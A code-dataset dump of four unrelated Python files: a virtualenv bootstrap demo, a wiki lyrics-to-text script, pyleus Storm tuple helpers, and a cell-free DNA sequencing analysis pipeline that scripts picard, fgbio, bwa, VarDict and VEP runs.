d27e21d645c4965ab93c46117caf11da2cb05560
| 1,439
|
py
|
Python
|
demo.py
|
sychen/initialize-virtualenv
|
bcd6950fe2b43c73a156e8d3c4e0f732eacb63de
|
[
"Apache-2.0"
] | null | null | null |
demo.py
|
sychen/initialize-virtualenv
|
bcd6950fe2b43c73a156e8d3c4e0f732eacb63de
|
[
"Apache-2.0"
] | null | null | null |
demo.py
|
sychen/initialize-virtualenv
|
bcd6950fe2b43c73a156e8d3c4e0f732eacb63de
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
from __future__ import print_function
import sys
import os
import collections
import json
import inspect
import time
import getpass
import re
import datetime
import argparse
def get_script_directory():
return os.path.realpath(
os.path.dirname(
inspect.getfile(
get_script_directory)))
def change_python_interpreter():
script_directory = get_script_directory()
environment = os.path.join(script_directory, 'environment')
print('environment:', environment)
# If the flow will do `git clean` every time,
# it's better to create the virtualenv outside the git repository;
# otherwise you will need to create it every time.
if not os.path.exists(environment):
print("Virtualenv is not found, initializing")
os.system(os.path.join(script_directory, 'initialize-virtualenv'))
print("Relaunching from virtualenv")
path_of_python = os.path.join(environment, 'bin', 'python')
print('path_of_python:', path_of_python)
os.execv(path_of_python, [path_of_python] + sys.argv)
try:
import requests
from jinja2 import Environment, FileSystemLoader
from jira import JIRA
from flask import Flask, render_template
import ntplib
import markdown
except Exception as e:
print(e)
print("Trigger virtualenv initialization")
change_python_interpreter()
if __name__ == "__main__":
pass
| 22.138462
| 74
| 0.715775
|
248581488ed2fad0f1f2cfa0461d5313ae502a33
| 1,349
|
py
|
Python
|
wiki_to_text.py
|
ITNano/WikiSubtitleReader
|
d9816a452f74f6d70e147eba688838d3b97189d5
|
[
"Apache-2.0"
] | 1
|
2019-01-20T14:46:16.000Z
|
2019-01-20T14:46:16.000Z
|
wiki_to_text.py
|
ITNano/WikiSubtitleReader
|
d9816a452f74f6d70e147eba688838d3b97189d5
|
[
"Apache-2.0"
] | 4
|
2016-08-08T06:56:46.000Z
|
2016-09-26T13:30:14.000Z
|
wiki_to_text.py
|
ITNano/WikiSubtitleReader
|
d9816a452f74f6d70e147eba688838d3b97189d5
|
[
"Apache-2.0"
] | 1
|
2018-08-11T08:01:56.000Z
|
2018-08-11T08:01:56.000Z
|
# -*- coding: utf-8 -*-
from raw_to_ass import Raw_to_ass_parser
import os.path #exists
import sys #exit and argv
import codecs #to write utf-8 output
import kuplett_parser
import diff_tool
from meta_parser import get_metadata
from preprocess import preprocess_ass
def wiki_to_text(username,password,outputdir,sourcefile):
lyrics=kuplett_parser.get_all_lyrics(sourcefile, username, password);
data = kuplett_parser.load_data(sourcefile)
counter = 0
for lyric in lyrics:
filename = outputdir + "/" + kuplett_parser.get_generic_name(data.get("urls")[counter])
counter += 1
if len(os.path.dirname(filename).strip()) > 0 and not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
outfile = codecs.open(filename, 'w', 'utf-8')
for line in lyric:
outfile.write(line+"\n")
return lyrics
if __name__ == "__main__":
if len(sys.argv)<4:
print("Need 3 arguments.")
print("Usage:")
print("get_and_parse_kuplett.py USERNAME PASSWORD OUTFILE_NAME")
sys.exit(3)
#if os.path.exists(sys.argv[3]):
# print("File '"+sys.argv[3]+"' already exists. Delete or rename it and try again.")
# sys.exit(1)
wiki_to_text(sys.argv[1], sys.argv[2], sys.argv[3],sourcefile="data_2017.txt")
| 34.589744
| 104
| 0.670126
|
6b906e2ed1025b67f37aabace63ecee4a3ab4ef4
| 1,671
|
py
|
Python
|
pyleus/storm/__init__.py
|
poros/pyleus
|
41fdb9f5808a824a58c89b8e9cf667de4948f2b7
|
[
"Apache-2.0"
] | null | null | null |
pyleus/storm/__init__.py
|
poros/pyleus
|
41fdb9f5808a824a58c89b8e9cf667de4948f2b7
|
[
"Apache-2.0"
] | null | null | null |
pyleus/storm/__init__.py
|
poros/pyleus
|
41fdb9f5808a824a58c89b8e9cf667de4948f2b7
|
[
"Apache-2.0"
] | null | null | null |
"""Package containing pyleus implementation of major Storm entities.
"""
from __future__ import absolute_import
from collections import namedtuple
DEFAULT_STREAM = "default"
StormTuple = namedtuple('StormTuple', "id comp stream task values")
"""Namedtuple representing a Storm tuple.
* **id**\(``str`` or ``long``): tuple identifier
* **comp**\(``str``): name of the emitting component
* **stream**\(``str``): name of the input stream the tuple belongs to
* **task**\(``int``): id of the task that emitted the tuple
* **values**\(``tuple``): values contained by the tuple
"""
def is_tick(tup):
"""Tell whether the tuple is a tick tuple or not.
:param tup: tuple to investigate
:type tup: :class:`~.StormTuple`
:return: ``True`` if the tuple is a tick tuple, ``False`` otherwise
:rtype: ``bool``
"""
# Tick tuples (generated by Storm; introduced 0.8) are defined as being
# from the __system component and __tick stream.
return tup.comp == '__system' and tup.stream == '__tick'
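# A minimal sketch of how this looks in practice (field values are illustrative):
#
#   tick = StormTuple(id='0', comp='__system', stream='__tick', task=-1, values=[30])
#   is_tick(tick)   # -> True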
def is_heartbeat(tup):
"""Tell whether the tuple is a heartbeat tuple or not.
:param tup: tuple to investigate
:type tup: :class:`~.StormTuple`
:return: ``True`` if the tuple is a heartbeat tuple, ``False`` otherwise
:rtype: ``bool``
"""
return tup.task == -1 and tup.stream == '__heartbeat'
class StormWentAwayError(Exception):
"""Raised when the connection between the component and Storm terminates.
"""
def __init__(self):
message = "Got EOF while reading from Storm"
super(StormWentAwayError, self).__init__(message)
from pyleus.storm.bolt import Bolt, SimpleBolt
from pyleus.storm.spout import Spout
_ = [Bolt, SimpleBolt, Spout] # pyflakes
| 30.381818
| 77
| 0.682226
|
ffb6ccad26fb18ff4e18fe3d82daa72d2fa19bd3
| 30,106
|
py
|
Python
|
source_codes/cfDNApipeline.py
|
dkleftogi/cfDNA_AnalysisPipeline
|
0ccb1c01e2c5629cbf89049ff2335b50b3b66881
|
[
"MIT"
] | 6
|
2019-08-28T23:10:46.000Z
|
2021-10-07T20:14:05.000Z
|
source_codes/cfDNApipeline.py
|
dkleftogi/cfDNA_AnalysisPipeline
|
0ccb1c01e2c5629cbf89049ff2335b50b3b66881
|
[
"MIT"
] | null | null | null |
source_codes/cfDNApipeline.py
|
dkleftogi/cfDNA_AnalysisPipeline
|
0ccb1c01e2c5629cbf89049ff2335b50b3b66881
|
[
"MIT"
] | 1
|
2020-04-28T07:14:45.000Z
|
2020-04-28T07:14:45.000Z
|
#!/usr/local/bin/python
'''
cfDNA analysis pipeline main script
BEGIN COPYRIGHT NOTICE
cfDNApipeline code -- (c) 2019 Dimitrios Kleftogiannis -- GIS -- A*STAR
Copyright 2019 Genome Institute of Singapore (GIS) and Agency for Science, Technology and Research (A*STAR).
This Program is free software licensed under the MIT License.
You may only use the source code in this repository in compliance with the license provided in this repository. For more details, please refer to the file named "LICENSE.md".
This Program is distributed as a service to the research community and is experimental in nature and may have hazardous properties.
The Program is distributed WITHOUT ANY WARRANTY, express or implied. In particular all warranties as to SATISFACTORY QUALITY or FITNESS FOR A PARTICULAR PURPOSE are excluded.
Published reports of research using this code (or a modified version) should cite the relevant article of this tool.
Comments and bug reports are welcome.
Email to dimitrios.kleftogiannis@kaust.edu.sa
I would also appreciate hearing about how you used this code, improvements that you have made to it.
You are free to modify, extend or distribute this code, as long as this copyright notice is included whole and unchanged.
END COPYRIGHT NOTICE
UTILITY
This program executes the cfDNA analysis workflow.
INPUT ARGUMENTS
1. The directory you passed to myEnvConfig.sh script where the Conda env is installed
2. An un-deDuped BAM file with UMI tags (absolute path)
3. The directory to store the results (absolute path)
4. A reference genome in fasta format (indexed)
5. A bed file with the panel design (absolute path)
6. The minimum variant allele frequency used for SNV calling (default is 0.005)
7. The string tag incorporated into the BAM file, used to group reads from the same family (e.g., RX or ZU)
8. The directory you downloaded the VEP Cache file (absolute path)
DEPENDENCIES
To resolve the depending programs make sure you run the provided configuration program myEnvConfig.sh and you activated the conda env
RUNNING
Please visit https://github.com/dkleftogi/cfDNA_AnalysisPipeline/blob/master/Execution_examples.md
We provide a step-by-step execution example. To obtain toy data used in this example please contact Dimitrios.
'''
import sys
import os
import re
from itertools import groupby
from collections import defaultdict, Counter
import datetime
from datetime import date
import time
import threading
#prints information about program's execution
def printUsage():
print('To run cfDNA analysis please follow the example below:\n')
print('python cfDNApipeline.py workingDir=XX fileName=XX resultsDir=XX referenceGenome=XX bedFile=XX minVAF=XX tagUMI=XX vepDir=XX\n')
print('Where:\n')
print('workingDir is the absolute directory where the conda env is installed\n')
print('fileName is the absolute path of the bam file\n')
print('resultsDir is the absolute path to a directory for storage of results \n')
print('referenceGenome is the reference genome in fasta format (absolute path)\n')
print('bedFile is the bed file with panel design (absolute path)\n')
print('minVAF is the minimum variant allele frequency used for variant calling (default 0.005)\n')
print('tagUMI is the tag string used to group reads from the same family\n')
print('vepDir is the absolute directory where VEP Cache is downloaded and indexed\n')
print('\n\nExample:\n')
print('python cfDNApipeline.py workingDir=/your/working/dir fileName=/path/to/your/example.bam resultsDir=/your/results/dir referenceGenome=/path/to/your/reference/genome.fa bedFile=/path/to/your/panel.bed minVAF=0.005 tagUMI=ZU vepDir=/path/to/your/VEP/cache')
print('\n\nPlease give the arguments in the indicated order similar to the example provided!\n')
print('\n\nAnd remember to activate the conda env\n')
#find the bam file prefix and the actual path and save the results
def storeFile(myFile):
#simple dict to store the values
aDict={}
#check if file exists
if os.path.exists(myFile):
line = myFile.rstrip('\n')
tmp=line.split("/")
sampleName=tmp[-1]
sampleName=sampleName[0:-4]
#print(filename)
restFile='/'.join(tmp[0:-1])
#print('%s with %s\n'%(sampleName,restFile))
aDict[sampleName]=restFile
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('[%s] ERROR from function storeFile: The file does not exist!\n'%(st))
print('************************************************************************************************************************************\n')
sys.exit()
return aDict
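#Illustrative example (path is hypothetical): storeFile('/data/run1/sampleA.bam')
#returns {'sampleA': '/data/run1'}, i.e. the BAM prefix mapped to its directory,
#which is the layout the downstream functions expect.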
#this function takes the bam file with UMIs and removes the duplicates
def processSample(fileHash,workingDir,resultsDir,referenceGenome,scriptsFolder,tagUMI):
#workingDir is the absolute path to your conda installation given from user's argument
GATK_merge='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/picard-2.20.3-0/picard.jar MergeSamFiles'
GATK_deDup='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/picard-2.20.3-0/picard.jar MarkDuplicates'
GATK_sort='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/picard-2.20.3-0/picard.jar SortSam'
FGBIO_mateInfo='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/fgbio/fgbio.jar --tmp-dir=/tmp SetMateInformation'
FGBIO_groupUMI='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/fgbio/fgbio.jar --tmp-dir=/tmp GroupReadsByUmi'
FGBIO_generateConsensus='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/fgbio/fgbio.jar --tmp-dir=/tmp CallMolecularConsensusReads'
FGBIO_filterConsensus='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/fgbio/fgbio.jar --tmp-dir=/tmp FilterConsensusReads'
GATK_samToFastq='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/picard-2.20.3-0/picard.jar SamToFastq'
GATK_mergeAlignment='java -Xmx10g -XX:-UseGCOverheadLimit -d64 -jar '+workingDir+'/miniconda2/share/picard-2.20.3-0/picard.jar MergeBamAlignment'
BWA_MEM='bwa mem -t 8 -v 2 -R '
for myArg in fileHash:
outScriptFile=scriptsFolder+'/'+myArg+'_PrePro_commands.txt'
outScript=open(outScriptFile,'w')
projectName='cfDNApipelinePart1'
mergedDIR=fileHash[myArg]
#command 1
mainCommand=GATK_sort+' I='+mergedDIR+'/'+myArg+'.bam O='+resultsDir+'/'+myArg+'.mergedQNAMEsorted.bam SO=queryname VERBOSITY=INFO TMP_DIR=/tmp'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 2
mainCommand=FGBIO_mateInfo+' -i='+resultsDir+'/'+myArg+'.mergedQNAMEsorted.bam -o='+resultsDir+'/'+myArg+'.mergedQNAMEsortedFixed.bam'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 3
#the command take parameters --edits=1 --min-map-q=20 --strategy=adjacency by default, the users can change this in the command below
mainCommand=FGBIO_groupUMI+' --input='+resultsDir+'/'+myArg+'.mergedQNAMEsortedFixed.bam --output='+resultsDir+'/'+myArg+'.grouped.bam --edits=1 --min-map-q=20 --raw-tag='+tagUMI+' --strategy=adjacency --family-size-histogram='+resultsDir+'/'+myArg+'.groupedHist.txt'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 4
mainCommand=GATK_sort+' I='+resultsDir+'/'+myArg+'.grouped.bam O='+resultsDir+'/'+myArg+'.groupedSorted.bam SO=coordinate TMP_DIR=/tmp'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 5
mainCommand='samtools index '+resultsDir+'/'+myArg+'.groupedSorted.bam'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 6
#the following parameters --error-rate-post-umi=30 --min-reads=2 --tag=MI are by default, the users can change this in the command below
mainCommand=FGBIO_generateConsensus+' --input='+resultsDir+'/'+myArg+'.grouped.bam --output='+resultsDir+'/'+myArg+'.consensusUnMapped.bam --error-rate-post-umi=30 --min-reads=2 --tag=MI'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 7
mainCommand=GATK_samToFastq+' I='+resultsDir+'/'+myArg+'.consensusUnMapped.bam F='+resultsDir+'/'+myArg+'.R1.fastq F2='+resultsDir+'/'+myArg+'.R2.fastq VALIDATION_STRINGENCY=SILENT TMP_DIR=/tmp'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 8
rgTAG='\'@RG\\tID:FgBio.'+myArg+''+'\\tPL:ILLUMINA\\tLB:ALL\\tPU:NA\\tSM:'+projectName+'\\tCN:NA\''
mainCommand=BWA_MEM+rgTAG+' -M '+referenceGenome+' '+resultsDir+'/'+myArg+'.R1.fastq '+resultsDir+'/'+myArg+'.R2.fastq | samtools view -hb - > '+resultsDir+'/'+myArg+'.UnSorted.FgbioDeDup.bam'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 9
mainCommand=GATK_sort+' I='+resultsDir+'/'+myArg+'.UnSorted.FgbioDeDup.bam O='+resultsDir+'/'+myArg+'.FgbioDeDup.bam SO=coordinate TMP_DIR=/tmp'
outScript.write(mainCommand)
outScript.write("\n\n")
#command 10
mainCommand='samtools index '+resultsDir+'/'+myArg+'.FgbioDeDup.bam'
outScript.write(mainCommand)
outScript.write("\n\n")
outScript.close()
#submit it
command='sh '+outScriptFile
os.system(command)
#this function runs variant screening and annotation
def variantScreening(fileHash,workingDir,resultsDir,referenceGenome,bedFile,scriptsFolder,minVAF_float,vepDir):
for myArg in fileHash:
outScriptFile=scriptsFolder+'/'+myArg+'_VarScreening_commands.txt'
outScript=open(outScriptFile,'w')
mainCommand='vardict -G '+referenceGenome+' -f '+str(minVAF_float)+ ' -N '+myArg+' -b '+resultsDir+'/'+myArg+'.FgbioDeDup.bam -z -c 1 -S 2 -E 3 -g 4 -h '+bedFile+' | '+workingDir+'/miniconda2/share/vardict-2019.06.04-0/teststrandbias.R | '+workingDir+'/miniconda2/share/vardict-2019.06.04-0/var2vcf_valid.pl -N '+myArg+' -E -f '+str(minVAF_float)+' > '+resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.vcf '
outScript.write(mainCommand)
outScript.write("\n\n")
#we annotate variants
#check https://m.ensembl.org/info/docs/tools/vep/script/vep_cache.html for more info about caches if needed
mainCommand='vep -i '+resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.vcf -o '+resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.vcf --species homo_sapiens --cache --dir '+vepDir +' --canonical --check_existing --force_overwrite --vcf --buffer_size 50'
outScript.write(mainCommand)
outScript.write("\n")
#the second script is ready and we just need to submit
outScript.close()
#submit it
command='sh '+outScriptFile
os.system(command)
#this function parses the annotated VCF and selects only the MODERATE/HIGH calls that fullfill specific criteria
def filterVCF(fileHash,resultsDir):
for myArg in fileHash:
myfile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.vcf'
if os.path.exists(myfile):
InVcfFile=open(myfile,'r')
outFileName=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered.txt'
outFile=open(outFileName,'w')
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
outFile.write('#Original input VCF file: %s.FgbioDeDup.VarDict.VEP.vcf -- Report produced: %s\n'%(myArg,st))
outFile.write('#CHROM\tPOS\tREF\tALT\tGENE\tvariantType\tCOV\tSupporintReads\tVAF\tRefBias\tVarBias\tMeanReadPos\tMeanReadQual\tMeanMappingQual\tSignalToNoise\tHighQualVarReads\tHighQualCov\tConsequence\tImpact\tBiotype\tProteinPos\tAminoAcidChange\tExistingVar\tPopulationVAF\tPredictedClinicalSignif\n')
for eachLine in InVcfFile:
#skip the header
if eachLine[0]!='#':
line=eachLine.rstrip('\n')
tmp=line.split('\t')
#parse the fields we need
CHROM = tmp[0]
POS = tmp[1]
ID = tmp[2]
REF = tmp[3]
ALT = tmp[4]
QUAL = tmp[5]
FILTER = tmp[6]
if FILTER=='PASS':
#get more specific fields about the variant of interest
FORMAT=tmp[7]
tmp=FORMAT.split(';')
#the last at the end is the VEP annotation that we need to parse separately using comma delimiter
annotationFields = tmp[-1]
sample = tmp[0].split('SAMPLE=')
sample = sample[1]
variantType = tmp[1].split('TYPE=')
variantType = variantType[1]
dp = tmp[2].split('DP=')
dp = int(dp[1])
vd = tmp[3].split('VD=')
vd = int(vd[1])
vaf = tmp[4].split('AF=')
vaf = float(vaf[1])
#we do not use this info
bias = tmp[5].split('BIAS=')
bias = bias[1]
refbias = tmp[6].split('REFBIAS=')
refbias = refbias[1]
varbias = tmp[7].split('VARBIAS=')
varbias = varbias[1]
#mean position in reads
pmean = tmp[8].split('PMEAN=')
pmean = float(pmean[1])
#mean quality in reads
qual = tmp[10].split('QUAL=')
qual = float(qual[1])
#this is the Fisher's test p-value from VarDict
sbf = tmp[12].split('SBF=')
sbf = float(sbf[1])
#mean mapping quality
mq = tmp[14].split('MQ=')
mq = float(mq[1])
#the higher the number the better the call
sn = tmp[15].split('SN=')
sn = float(sn[1])
#consider high coverage variant reads
hicnt = tmp[22].split('HICNT=')
hicnt = int(hicnt[1])
#consider high coverage reads
hicov = tmp[23].split('HICOV=')
hicov = int(hicov[1])
tmp = annotationFields.split(',')
for idx in tmp:
#find the canonical transcript
if 'YES' in idx:
canonicalTrans = idx
vepTmp = canonicalTrans.split('|')
Consequence = vepTmp[1]
IMPACT = vepTmp[2]
GENE = vepTmp[3]
BIOTYPE = vepTmp[7]
Protein_position = vepTmp[14]
Amino_acids = vepTmp[15]
Existing_variation = vepTmp[17]
AF = vepTmp[24]
CLIN_SIG = vepTmp[25]
#here we continue otherwise we skip because we are not interested in synonymous variants...
if IMPACT=='MODERATE' or IMPACT=='HIGH':
#write the output except for Complex type of mutations returned by VarDict
if 'Complex' not in variantType:
#apply some filtering
a=varbias.split(':')
FW=int(a[0])
BW=int(a[1])
#here we consider only high quality reads, just to refine our results
if hicov>=100 and hicnt>=3 and FW>1 and BW>1 and pmean>15 and sn>20:
outFile.write('%s\t%s\t%s\t%s\t%s\t%s\t%d\t%d\t%.3f\t%s\t%s\t%.3f\t%.3f\t%.3f\t%.3f\t%d\t%d\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n'%(CHROM,POS,REF,ALT,GENE,variantType,dp,vd,vaf,refbias,varbias,pmean,qual,mq,sn,hicnt,hicov,Consequence,IMPACT,BIOTYPE,Protein_position,Amino_acids,Existing_variation,AF,CLIN_SIG))
InVcfFile.close()
outFile.close()
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] ERROR from function filterVCF: The input %s file does not exist!\n'%(st,myfile))
print('************************************************************************************************************************************\n')
sys.exit()
#this function parses the filtered VCF and generates the input required for duplexCaller to run
def convertFilteredVCF(fileHash,resultsDir):
for myArg in fileHash:
myfile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered.txt'
if os.path.exists(myfile):
outputFile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered_modified.txt'
tmpFile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered_tmp.txt'
InFile=open(myfile,'r')
outFile=open(tmpFile,'w')
for eachLine in InFile:
if eachLine[0]=='#':
pass #header line, nothing to extract
else:
line = eachLine.rstrip('\n')
tmp=line.split("\t")
chrom=tmp[0]
pos=tmp[1]
refAllele=tmp[2]
altAllele=tmp[3]
myType=tmp[5]
if myType=='SNV' or myType=='SNP':
outFile.write('%s\t%s\n'%(chrom,pos))
elif myType=='DEL' or myType=='Deletion':
c=len(refAllele)
for myCount in range(int(pos),int(pos)+c):
outFile.write('%s\t%s\n'%(chrom,myCount))
elif myType=='INS' or myType=='Insertion':
c=len(altAllele)
for myCount in range(int(pos),int(pos)+c):
outFile.write('%s\t%s\n'%(chrom,myCount))
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] WARNING from function convertFilteredVCF: No supported mutation type in %s!\n'%(st,myfile))
print('************************************************************************************************************************************\n')
#sys.exit()
InFile.close()
outFile.close()
command='sort '+tmpFile+' | uniq >'+outputFile
os.system(command)
#remove the tmp file
command='rm '+tmpFile
os.system(command)
else:
#the file does not exist
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] ERROR from function convertFilteredVCF: The input file %s does not exist!\n'%(st,myfile))
print('************************************************************************************************************************************\n')
sys.exit()
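#Illustrative example of the position expansion above (coordinates are hypothetical):
#an SNV at chr1 position 100 yields a single line "chr1\t100", while a DEL with REF "ACG"
#at the same position yields "chr1\t100", "chr1\t101" and "chr1\t102", so that every
#base overlapping the event is interrogated by duplexCaller.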
def runDuplexCaller(fileHash,resultsDir,referenceGenome,scriptsFolder):
for myArg in fileHash:
positionFile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered_modified.txt'
if os.path.exists(positionFile):
outScriptFile=scriptsFolder+'/'+myArg+'_duplexCallerCommand.txt'
outScript=open(outScriptFile,'w')
myBAM=resultsDir+'/'+myArg+'.FgbioDeDup.bam'
Num=1
outScript.write('python duplexCallerModified_AWS.py bamFile=%s positionFile=%s referenceGenome=%s outDIR=%s index=%d\n'%(myBAM,positionFile,referenceGenome,resultsDir,Num))
outScript.close()
#we submit the duplexCaller script
command='sh '+outScriptFile
os.system(command)
#the file does not exist
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] ERROR from function runDuplexCaller: The input position file %s does not exist!\n'%(st,positionFile))
print('************************************************************************************************************************************\n')
sys.exit()
def cleanVariantReport(fileHash,resultsDir,referenceGenome,scriptsFolder):
for myArg in fileHash:
originalFile=resultsDir+'/'+myArg+'.FgbioDeDup.VarDict.VEP.filtered.txt'
if os.path.exists(originalFile):
variantReport=resultsDir+'/'+myArg+'.FgbioDeDup_VariantReport.txt'
if os.path.exists(variantReport):
outScriptFile=scriptsFolder+'/'+myArg+'_CleanVariantReportCommand.txt'
outScript=open(outScriptFile,'w')
outScript.write('python filterVariantReportAdjusted.py inputFile=%s originalVCF=%s\n'%(variantReport,originalFile))
outScript.close()
#submit it
command='sh '+outScriptFile
os.system(command)
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] ERROR from function cleanVariantReport: The variant report file %s does not exist!\n'%(st,variantReport))
print('************************************************************************************************************************************\n')
sys.exit()
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('[%s] ERROR from function cleanVariantReport: The original file %s does not exist!\n'%(st,originalFile))
print('************************************************************************************************************************************\n')
sys.exit()
#this function generates the distribution of fragment length
def fragmentLenAnalysis(fileHash,resultsDir,bedFile,scriptsFolder):
for myArg in fileHash:
inputFile=resultsDir+'/'+myArg+'.FgbioDeDup.bam'
if os.path.exists(inputFile):
outScriptFile=scriptsFolder+'/'+myArg+'_fragLenCommand.txt'
outScript=open(outScriptFile,'w')
outScript.write('python insertSizeAnalysisBED.py bamFile=%s bedFile=%s outDIR=%s\n'%(inputFile,bedFile,resultsDir))
outScript.close()
#submit it
command='sh '+outScriptFile
os.system(command)
else:
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('[%s] ERROR from function fragmentLenAnalysis: The input bam file %s does not exist!\n'%(st,inputFile))
print('************************************************************************************************************************************\n')
sys.exit()
#main function of the program
def myMain():
#check the number of input arguments
if len(sys.argv)!=9:
print('************************************************************************************************************************************\n')
print('\t\t\t\t\t\tYour input arguments are not correct!\n')
print('\t\t\t\t\t Genome Institute of Singapore (GIS) -- A*STAR\n')
print('\t\t\tCopyright 2019 GIS - Dimitrios Kleftogiannis & Jun Xian Liew - dimitrios.kleftogiannis@kaust.edu.sa\n')
#if arguments are not correct print a help message
printUsage()
else:
print('************************************************************************************************************************************\n')
print('\t\t\t cfDNApipeline.py: Run the full pipeline for cfDNA data processing and analysis\n')
print('\t\t\t\t Genome Institute of Singapore (GIS) -- A*STAR\n')
print('\t\tCopyright 2019 GIS - Dimitrios Kleftogiannis & Jun Xian Liew - dimitrios.kleftogiannis@kaust.edu.sa\n')
#parse the input arguments
workingDir =sys.argv[1].split('workingDir=')
workingDir =workingDir [1]
fileName =sys.argv[2].split('fileName=')
fileName =fileName [1]
resultsDir =sys.argv[3].split('resultsDir=')
resultsDir =resultsDir[1]
referenceGenome =sys.argv[4].split('referenceGenome=')
referenceGenome =referenceGenome[1]
bedFile =sys.argv[5].split('bedFile=')
bedFile =bedFile[1]
minVAF =sys.argv[6].split('minVAF=')
minVAF =minVAF[1]
minVAF_float=float(minVAF)
if minVAF_float<0 or minVAF_float>1.00:
print('\nWARNING: User gave invalid minVAF argument. Execution continues with default minVAF=0.005\n')
minVAF_float=0.005
tagUMI =sys.argv[7].split('tagUMI=')
tagUMI =tagUMI [1]
vepDir =sys.argv[8].split('vepDir=')
vepDir =vepDir [1]
#print the arguments given by user
print('Execution started with the following parameters:\n')
print('1. workingDir : \t\t\t\t%s' % workingDir)
print('2. fileName : \t\t\t\t%s' % fileName)
print('3. resultsDir : \t\t\t\t%s' % resultsDir)
print('4. referenceGenome : \t\t\t\t%s' % referenceGenome)
print('5. bedFile : \t\t\t\t%s' % bedFile)
print('6. minVAF : \t\t\t\t%.4f' % minVAF_float)
print('7. tagUMI : \t\t\t\t%s' % tagUMI)
print('8. vepDir : \t\t\t\t%s' % vepDir)
#generate a folder to store the scripts
scriptsFolder=workingDir+'/cfDNApipeline_scripts'
command='mkdir -p '+scriptsFolder #+' && mkdir -p '+LSF_logs+' && mkdir -p '+LSF_err
os.system(command)
#generate the folder for the results
command='mkdir -p '+resultsDir
os.system(command)
#save the file
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function storeFile: store file name and path'%(st))
fileHash=storeFile(fileName)
#process the file and generate consensus using UMIs
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function processSample: produce BAM file with consensus sequences'%(st))
processSample(fileHash,workingDir,resultsDir,referenceGenome,scriptsFolder,tagUMI)
#based on the consensus, run variant screening
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function variantScreening: perform variant screening and annotate variants'%(st))
variantScreening(fileHash,workingDir,resultsDir,referenceGenome,bedFile,scriptsFolder,minVAF_float,vepDir)
#filter the annotated VCF file
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function filterVCF: parse annotated VCF file and filter'%(st))
filterVCF(fileHash,resultsDir)
#prepare the data for duplexCaller
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function convertFilteredVCF: parse the filtered VCF file and produce position files'%(st))
convertFilteredVCF(fileHash,resultsDir)
#run it
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n\n[%s] Function runDuplexCaller: identify duplexes using duplexCaller'%(st))
runDuplexCaller(fileHash,resultsDir,referenceGenome,scriptsFolder)
#produce the filtered report
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] Function cleanVariantReport: produce final variant report'%(st))
cleanVariantReport(fileHash,resultsDir,referenceGenome,scriptsFolder)
#finally we run the fragment length analysis from script insertSizeAnalysisBED.py
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print('\n[%s] Function fragmentLenAnalysis: perform analysis of fragment length'%(st))
fragmentLenAnalysis(fileHash,resultsDir,bedFile,scriptsFolder)
print('************************************************************************************************************************************\n')
#start ...
if __name__=='__main__':
myMain()
| 47.560821
